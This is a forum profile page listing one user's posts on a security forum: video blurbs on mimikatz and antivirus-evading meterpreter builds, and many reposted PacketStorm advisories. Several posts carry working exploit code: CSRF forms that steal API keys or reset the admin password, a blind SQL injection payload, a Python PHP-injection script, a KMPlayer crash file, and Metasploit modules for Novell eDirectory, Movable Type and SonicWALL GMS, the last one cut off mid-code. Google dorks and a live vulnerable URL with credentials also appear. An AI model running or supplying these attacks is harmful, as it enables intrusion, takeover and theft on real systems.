Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    Description: In this video I will show you how to use mimikatz for post – exploitation. Using Mimikatz you can play with Certificates, dump keys and Inject your custom ddl into any process. In this demo I will show you how to dump certificates and how to inject kelloworld.dll in notepad Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Advanced Post - Exploitation Using Mimikatz
      • 1
      • Upvote
  2. Praetorian503
    Description: In this video I will show you how to create an msfpayload without Metasploit framework using Inmet tool, Using this tool you can avoid almost all Avs detection - very easy to use and powerful tool for exploiting a system. Using this tool you can also exploit system directly no need to create a backdoor. The ultimate meterpreter executable. https://github.com/SherifEldeeb/inmet ultimet: • Is a windows executable that can function as various meterpreter flavours, in addition to functioning as "msfpayload" to generate exe files that run hidden when executed. • Supports functioning as the following meterpreter "types": "reverse_tcp", "bind_tcp", "reverse_http", "reverse_https", "metsvc_bind_tcp" and "metsvcreverse_tcp" • Can create exe files that connects upon execution using pre-configured settings "exactly as msfpayload generated exe", however, generated exe files still accept command line arguments and settings could be reset or changed, all supported from within that single exe ... "meterpreter-on-steroids :)". • The generated exe is a pre-configured ultimet that can be used to create OTHER exe files! so, let's say you created a reverse_tcp exe using the --msfpayload option, you can use THAT exe later to create another bind_metsvc, then use THAT exe to create a reverse_http ... and so on, or simply reset to default...pretty neat! ultimet is a program that once found its way to inside a windows environmet, you won't need msfpayload or msfvenom anymore to create different exe files for different settings, use the same exe for different situations • The msfpayload-like functionality works under linux perfectly fine using "wine >= 1.3.17", no need to leave your beloved *n?x box to create a pre-configured exe. • Supports many options to load the stage from: Resource, Encrypted-Resource, file, encrypted file or over the network "stager-mode" ... it functions as a non-staged payload "inline" when the stage is provided "either through file or the default bundled-resource". • Offset of ReflectiveLoader function is calculated at runtime and bootstrap is patched in memory, so, in plain english, you can use your own self-compiled metsrv.dll as the stage!. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The Ultimate Meterpreter Executable And Bypass Avs Using Inmet
  3. Praetorian503
    Description: We present FRAK, the firmware reverse analysis konsole. FRAK is a framework for unpacking, analyzing, modifying and repacking the firmware images of proprietary embedded devices. The FRAK framework provides a programmatic environment for the analysis of arbitrary embedded device firmware as well as an interactive environment for the disassembly, manipulation and re-assembly of such binary images. We demonstrate the automated analysis of Cisco IOS, Cisco IP phone and HP LaserJet printer firmware images. We show how FRAK can integrate with existing vulnerability analysis tools to automate bug hunting for embedded devices. We also demonstrate how FRAK can be used to inject experimental host-based defenses into proprietary devices like Cisco routers and HP printers. Ang Cui is the founder of Red Ballon Security Inc., which specializes in the development of offensive and defensive technologies for embedded systems. Ang is also currently a PhD candidate at Columbia University in the Intrusion Detection Systems Laboratory. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Embedded Device Firmware Vulnerability Hunting Using Frak
  4. Praetorian503
    Description: This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now...oh and it took me a week or so...Alternately, you could license it to vendors since their programmers are lazy. Andrew King is a recent graduate. He has been a hobbyist for many years, but has only recently tried to transition into information security as a job field. A previous talk was given at ToorCon on polymorphism as it relates to definitions. He wrote a set of articles demonstrating implementation of simple internal to function encoding and decoding. Additional code will be released to demonstrate automation of binary patching to use this method without using a debugger. It is not a fully functional evasion tool, but it does demonstrate pushing this level of obfuscation into a more automated arena. Adding a couple of small code sections could turn this in to a usable evasion tool. Twitter: @aking1012 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Detecting Reflective Injection
  5. Praetorian503
    WordPress SolveMedia version 1.1.0 suffers from a cross site request forgery vulnerability. # Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability # Release Date: 24/01/13 # Author: Junaid Hussain - [ illSecure Research Group ] - # Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com # Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip # Vendor Homepage: http://solvemedia.com # Tested on: CentOs 5 # Google Dork: inurl:wp-content/plugins/solvemedia ----------------------------------------------------------------------------------------------------------------------- //##### Introduction: SolveMedia is a capatcha service that allows webmasters to monetize from correct captcha type-ins, solvemedia.admin.inc is vulnerable to CSRF, there is no anti-CSRF tokens implemented nor is the wp-nonce function used, therefore an attacker can change the webmasters SolveMedia API Keys (public key, private key, hash key) to the attackers own set of API keys thus stealing the webmasters SolveMedia revenue. ------------------------------------------------------------------------------------------------------------------------- //##### CSRF - Proof Of Concept: <html> <form method="post" action="http://illsecure.com/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true"> <input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/> <input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/> <input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" /> <input type="submit" name="submit" value="Enter" /> </form> </html> \\##### End Poc ##### ------------------------------------------------------------------------------------------------------------------------- //##### Patch: -- Vendor was notified on the 22/01/2013 -- Vendor released version 1.1.1 on 23/01/2013 which included a patch --- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/ --- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/ ------------------------------------------------------------------------------------------------------------------------- //##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt Source: PacketStorm
  6. Praetorian503
    SQLiteManager versions 1.2.4 and below suffer from a remote PHP code injection vulnerability. Description: =============================================================== Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability Google Dork: intitle:SQLiteManager inurl:sqlite/ Date: 23/01/2013 Exploit Author: RealGame Vendor Homepage: http://www.Relagame.co.il Software Link: http://sourceforge.net/projects/sqlitemanager/ Version: <=1.2.4 Tested on: Windows XP, Debian 2.6.32-46 CVE: N/A =============================================================== Vulnerable Softwares: Name: SQLiteManager Official Site: http://www.sqlitemanager.org/ Name: Ampps Official Site: http://www.ampps.com/ Name: VertrigoServ Official Site: http://vertrigo.sourceforge.net/ =============================================================== About Software: Official Site: http://www.sqlitemanager.org/ SQLiteManager is a database manager for SQLite databases. You can manage any SQLite database created on any platform with SQLiteManager. =============================================================== Easy Way To Fix: Find: SQLiteStripSlashes($_POST['dbpath']) Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath'])) On File: ./include/add_database.php =============================================================== import re import urllib2 from urllib import urlencode from sys import argv, exit def strip_tags(value): #Strip tags with RegEx return re.sub('<[^>]*?>', '', value) def getDbId(sqliteUrl, myDbName): #Find Components htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read() if htmlRes: #If you found it take all the rows td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL) #Make a dict of stripped columns for element in td: if strip_tags(element) == myDbName: #Return Id return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL)) return None def main(): print \ 'SQLiteManager Exploit\n' + \ 'Made By RealGame\n' + \ 'http://www.RealGame.co.il\n' if len(argv) < 2: #replace('\\', '/') - To Do The Same In Win And Linux filename = argv[0].replace('\\', '/').split('/')[-1] print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n' exit() sqliteUrl = argv[1] myDbName = "phpinfo" myDbFile = "phpinfo.php" #Create Database params = {'dbname' : myDbName, 'dbVersion' : '2', 'dbRealpath' : None, 'dbpath' : myDbFile, 'action' : 'saveDb'} urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120) #Get Database ID dbId = getDbId(sqliteUrl + "left.php", myDbName) #If Database Created if dbId: #Create Table + Shell Creator params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \ 'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n', 'sqlFile' : None, 'action' : 'sql', 'sqltype' : '1'} Source: PacketStorm
  7. Praetorian503
    iCart Pro version 4.0.1 appears to suffer from a remote SQL injection vulnerability. # Exploit Title: vbcovor ICART SQLI # Date: 25/01/2013 # Author(s): n3tw0rk # Contact: Mail:infectedelite@gmail.com # Product: iCart Pro # Software Version 4.0.1 # Product Download: http://www.vbcover.com/icart.php?do=product&productid=61 # Google Dork: inurlicart.php # Require Editting product access for SQL error admin account will work # Exploit link:icart.php?do=editproduct&productid=[product ID]&section=' Live link:https://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section=' (requires admin access login test:1234) Database error in vBulletin 4.2.0: Invalid SQL: SELECT name, ' FROM covercartproduct WHERE id = '19'; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '19'' at line 1 Error Number : 1064 Request Date : Friday, January 25th 2013 @ 06:46:30 AM Error Date : Friday, January 25th 2013 @ 06:46:31 AM Script : http://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section=' Referrer : IP Address : Username : Teascu Dorin Classname : vB_Database MySQL Version : 5.0.96-log Shouts to: Teoz, n0tch, shadow008. http://myupdatezone.com for more 0days and databases Source: PacketStorm
  8. Praetorian503
    PHP Weby Directory Software version 1.2 suffers from cross site request forgery and remote blind SQL injection vulnerabilities. =========================================== Vulnerable Software: PHP Weby directory software version 1.2 Vendor: http://phpweby.com Download: ht*p://phpweby.com/down/phpwebydirectory.zip Vuln: Blind SQL injection && CSRF Dork: intext:Powered by PHP weby software =========================================== About Software: Php Weby directory script is a powerful and easy-to-use FREE link management script with numerous options for running a directory, catalog of sites or a simple link exchange system. Create a general directory and have users submit their favorite sites and charge if you want for the review. Or create regional directory for your town or state and sell advertising, or niche directory about a topic you love or know. Features include an integrated payment system with PayPal, link validation, SEO urls, unlimited categories and subcategories, reciprocal linking, link editor, template driven system and many more. Check them all here. Php weby free link directory script is licensed under GNU GPL license. Link to http://phpweby.com can NOT be removed. Contact us at the forums for more information. . =========================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =========================================== Here is one of Vulnerable Code example: //contact.php ==============SNIP BEGINS=============== if($capt) { unset($capt); if($_POST['fullname']=='' || $_POST['subject']=='' || $_POST['message']=='' || $_POST['mail']=='') $smarty->assign('error','Please complete the form!'); else { $c=$db->Execute("INSERT INTO contacts(fullname,subject,message,mail,ip,timehour) values('" . $_POST['fullname'] . "','" . $_POST['subject'] . "','" . $_POST['message'] . "','" . $_POST['mail'] . "','" . $_SERVER['REMOTE_ADDR']."','".date('r'). "')"); if($c===false) $smarty->assign('error','Unknown error occured.'); else $smarty->assign('added',1); ===========SNIP ENDS HERE================ ===============Exploitation =============== METHOD: $_POST URL: http://site.tld/contact.php Headers: Host: hacker1.own User-Agent: UiUiUiUiUi Ping And UiUiUiUiUi And Pong:(( Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 245 REQ BODY: fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST ===================EOF=================== Here is how it looks: (I prefer timebased way because simply extracting and then inserting hash to table is not usefull anymore.Only admin can see it from admin panel). IMAGE 1: http://s017.radikal.ru/i420/1301/c6/11128cbea352.png COPY IMAGE: http://oi47.tinypic.com/2ptp79g.jpg Also this type of sql injections(INSERT/UPDATE) is usefull to create Denial of Service conditions against target site/server. If so simply benchmark() is your best friend. Second Vulnerability is: CSRF Simple exploit to change admin username/password/email: Login/password will be change to pwned and email to : admin@toattacker.tld <body onload="javascript:document.forms[0].submit()"> <form action="http://hacker1.own/phpweb/admin/options.php?r=admin" method="post"> <input type="text" name="ADMIN_NAME" value="admin"/> <input type="text" name="ADMIN_MAIL" value="admin@toattacker.tld"/> <input type="text" name="usr" value="pwned"/> <input type="password" name="pass1" value="pwned"/> <input type="password" name="pass2" value="pwned"/> <input type="hidden" name="oldusr" value="admin"/> <input type="submit" value="Save" class="ss"/> </form> ==================================== KUDOSSSSSSS ==================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers. Also special thanks to: ottoman38 & HERO_AZE ==================================== /AkaStep Source: PacketStorm
  9. Praetorian503
    KMPlayer versions 3.5.0.77 and below suffer from a denial of service vulnerability. Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions Author : Jigsaw (Abdelmorite Eljoaydi) Date : 26-01-2013 E-mail : jigsaw0658@gmail.com Home : Morroco Facebook page : facebook.com/abdelmorit.alma platform : software Impact : Denial Of Service Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77 OS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable Risk : Low[+] / Medium[-] ====How to reproduce==== When creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager . =========Proof of concept=========== #!/usr/bin/perl my $j = "\x41" x 90000; my $h = "\x4D\x33\x55"; my $file = "kmplayer.m3u"; open ($File, ">$file"); print $File $h.$j; close ($File); ==================================== Source: PacketStorm
  10. Praetorian503
    Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that the mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize capabilities of shellcode detection algorithms developed over recent ten years into optimal classifiers. The proposed approach allows us to reduce the total fp rate almost to 0, provides full coverage of shellcode classes detected by individual classifiers and significantly increases total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia shows that hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than linear combination of classifiers, and almost 1.5 times faster for shellcode only datasets. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
  11. Praetorian503
    [*]Target Link [*]Task: -Version; -Database; -User; -Hostname; -Nickname. [*]Rules: -Post a screenshot; -Use union based; -Send me PM with your syntax. [*]Proof: [*]Solvers: [table=width: 120, class: grid, align: left] [tr] [td]UnderKode[/td] [/tr] [tr] [td]StoNe-[/td] [/tr] [tr] [td]Boogy[/td] [/tr] [tr] [td]alexx666xx[PM][/td] [/tr] [tr] [td]afumat[/td] [/tr] [tr] [td]daNNy.bv[/td] [/tr] [tr] [td]express_[/td] [/tr] [tr] [td]phynx (PM)[/td] [/tr] [tr] [td]EterNo[/td] [/tr] [tr] [td] CLOSED [/td] [/tr] [/table]
  12. Praetorian503
    Description: You know you can't stay away! The most talked about panel at DEF CON! Nearly two hours of non-stop FAIL. Come hear some of the loudest mouths in the industry talk about the epic security failures of the last year. So much fail, you'll need the food cooked on stage to survive. Nothing is sacred not even each other. This years fail includes cloud, mobile and apt to name just a few topics. If that's not enough, we'll also be making crepes on stage. Over the last two years, we've raised over $1,500 for the EFF, let's see how much we can do this year.... Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Def Con Comedy Jam V, V For Vendetta
  13. Praetorian503
    Description: ANTHONY "DARKFLOYD" LAI SECURITY RESEARCHER, VALKYRIE-X SECURITY RESEARCH GROUP (VXRL) TONY "MT" MIU RESEARCHER, VXRL KELVIN "CAPTAIN" WONG RESEARCHER, VXRL ALAN "AVENIR" CHUNG RESEARCHER, VXRL Enterprises currently dump millions of bucks to defense against DDoS, some trading firms here are paying for fear to the DDoS attack from China about 5K to 100K USD per day and InfoSec teams believe their solutions are perfect already. Are those controls effective and unbreakable? In the first part of the presentation, we would like to show our studies and carry out over 10 types of DDoS test against various big firms and organizations to see whether their defense is effective, showing how stupid and smart they are. Various interesting case studies will be briefed In the second part of the presentation, we will detail our proposed defense model to against Application-Level attacks. We have already checked with other vendors and researchers about our model, it is still not yet deployed and hopefully we could put this as an open source project in the future. Hopefully, you will enjoy this fun session with us and learn whether your organization could survive even under DDoS attack. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: http://www.securitytube.net/video/6757
  14. Praetorian503
    Vezi ca nu merge butonul exit! Probabil ai pus: Process.Start("www.rstforums.com") Si ai uitat: Me.Close() Trebuia: Process.Start("www.rstforums.com") Me.Close() Oricum, frumos, folositor. PS: Frumos nume Poate apare si COAILII v2.0:))
  15. Praetorian503
    Security firm Trend Micro has predicted the number of threats targeting the Android mobile operating system will pass the one million mark by the end of 2013. The increase would represent a near tripling of the number of threats currently known to be targeting Android. Trend Micro reported that at the end of 2012 it had detected roughly 350,000 threats targeting Google's operating system. The figure means that it has taken Android just three years to boast the same number of threats it took PCs 14 years to reach. "2012 was a year of real evolution in traditional threat and evolution into new platforms and geographies," said Trend Micro vice president of security research, Rik Ferguson. "The mobile threat has come of age, criminals are already moving their operations into former developing internet economies and have devoted a lot of effort to hardening their point and click attack toolkits to evade detection by security vendors. "We must continue to track and anticipate these developments in the security industry." The report also revealed that Android users are seeming unconcerned about the threat facing them. Trend Micro reported only one in five current Android devices have a security service installed. Ferguson warned that criminals will likely begin to use Android as a springboard to target other new platforms. "Android is already the criminals mobile OS of choice as these reports demonstrate, it is not too much of a stretch to think of criminals looking for ways to exploit other connected devices in the future," said Ferguson. "If there's a financial incentive, whether that is hacking what you can see to influence your behaviour by pushing criminal scams, selling your behavioural and consumption data or stealing your electricity supply, they will do it." Trend Micro's comments follow on from the discovery of several new Android malware strains. Most recently competitor Symantec released a report claiming the Android.Exprespam spam had managed to infect multiple thousands of devices two weeks after it began operating. Source: Android threats to top one million by year's end - IT News from V3.co.uk
  16. Praetorian503
    This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Novell eDirectory 8 Buffer Overflow', 'Description' => %q{ This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges. }, 'Author' => [ 'David Klein', # Vulnerability Discovery 'Gary Nilson', # Exploit 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0432'], [ 'OSVDB', '88718'], [ 'BID', '57038' ], [ 'EDB', '24205' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ], [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ] ], 'DisclosureDate' => 'Dec 12 2012', 'Platform' => 'linux', 'Privileged' => true, 'Arch' => ARCH_X86, 'Payload' => { }, 'Targets' => [ [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3', { 'Ret' => 0x080a4697, # jmp esi from ndsd 'Offset' => 58 } ] ], 'DefaultTarget' => 0 )) register_options([Opt::RPORT(524),], self.class) end def check connect sock.put(connection_request) res = sock.get disconnect if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 # res[8,2] => Reply Type # res[15,1] => Connection Status return Exploit::CheckCode::Safe end return Exploit::CheckCode::Detected end def connection_request pkt = "\x44\x6d\x64\x54" # NCP TCP id pkt << "\x00\x00\x00\x17" # request_size pkt << "\x00\x00\x00\x01" # version pkt << "\x00\x00\x00\x00" # reply buffer size pkt << "\x11\x11" # cmd => create service connection pkt << "\x00" # sequence number pkt << "\x00" # connection number pkt << "\x00" # task number pkt << "\x00" # reserved pkt << "\x00" # request code return pkt end def exploit connect print_status("Sending Service Connection Request...") sock.put(connection_request) res = sock.get if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 # res[8,2] => Reply Type # res[15,1] => Connection Status fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed") end print_good("Service Connection successful") pkt = "\x44\x6d\x64\x54" # NCP TCP id pkt << "\x00\x00\x00\x00" # request_size (filled later) pkt << "\x00\x00\x00\x01" # version (1) pkt << "\x00\x00\x00\x05" # reply buffer size pkt << "\x22\x22" # cmd pkt << "\x01" # sequence number pkt << res[11] # connection number pkt << "\x00" # task number pkt << "\x00" # reserved pkt << "\x17" # Login Object FunctionCode (23) pkt << "\x00\xa7" # SubFuncStrucLen pkt << "\x18" # SubFunctionCode pkt << "\x90\x90" # object type pkt << "\x50" # ClientNameLen pkt << rand_text(7) jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP pkt << rand_text(target['Offset'] - jmp_payload.length) pkt << [target.ret].pack("V") pkt << payload.encoded pkt[4,4] = [pkt.length].pack("N") print_status("Sending Overflow on Keyed Object Login...") sock.put(pkt) sock.get disconnect end end Source: PacketStorm
  17. Praetorian503
    This Metasploit module can be used to execute a payload on MoveableType (MT) that exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. This allows for code injection. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', 'Description' => %q{ This module can be used to execute a payload on MoveableType (MT) that exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. The vulnerability arises due to the following properties: 1. This script may be invoked remotely without requiring authentication to any MT instance. 2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters. 3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection. }, 'Author' => [ 'Kacper Nowak', 'Nick Blundell', 'Gary O\'Leary-Steele' ], 'References' => [ ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) ['CVE', '2013-0209'], ['URL', 'http://www.sec-1.com/blog/?p=402'], ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd' } }, 'Platform' => [ 'win', 'unix' ], 'Targets' => [ ['Movable Type 4.2x, 4.3x', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jan 07 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt']) ], self.class) end def check @peer = "#{rhost}:#{rport}" fingerprint = rand_text_alpha(5) print_status("#{@peer} - Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError return Exploit::CheckCode::Unknown end if (res) if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) return Exploit::CheckCode::Vulnerable elsif (res.code != 200) return Exploit::CheckCode::Unknown else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end end def exploit @peer = "#{rhost}:#{rport}" print_status("#{@peer} - Sending payload...") http_send_cmd(payload.encoded) end def http_send_raw(cmd) path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') send_request_cgi( { 'uri' => path, 'method' => 'POST', 'vars_post' => { '__mode' => 'run_actions', 'installing' => '1', 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]} } }) end def http_send_cmd(cmd) pay = 'v0;use MIME::Base64;system(decode_base64(q(' pay << Rex::Text.encode_base64(cmd) pay << ')));return 0' http_send_raw(pay) end end Source: PacketStorm
  18. Praetorian503
    This Metasploit module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the "appliance" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the "appliance" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used. }, 'Author' => [ 'Nikolas Sotiriu', # Vulnerability Discovery 'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-1359'], [ 'OSVDB', '89347' ], [ 'BID', '57445' ], [ 'EDB', '24204' ] ], 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'Targets' => [ [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 17 2012')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) ], self.class) end def on_new_session # on_new_session will force stdapi to load (for Linux meterpreter) end def generate_jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) var_data = Rex::Text.rand_text_alpha(rand(8)+8) var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) var_counter = Rex::Text.rand_text_alpha(rand(8)+8) var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) var_comb = Rex::Text.rand_text_alpha(rand(8)+8) var_exe = Rex::Text.rand_text_alpha(rand(8)+8) @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) var_proc = Rex::Text.rand_text_alpha(rand(8)+8) var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) jspraw = "<%@ page import=\"java.io.*\" %>\n" jspraw << "<%\n" jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" jspraw << "String #{var_data} = \"\";\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" jspraw << "}\n" jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" jspraw << "int #{var_numbytes} = 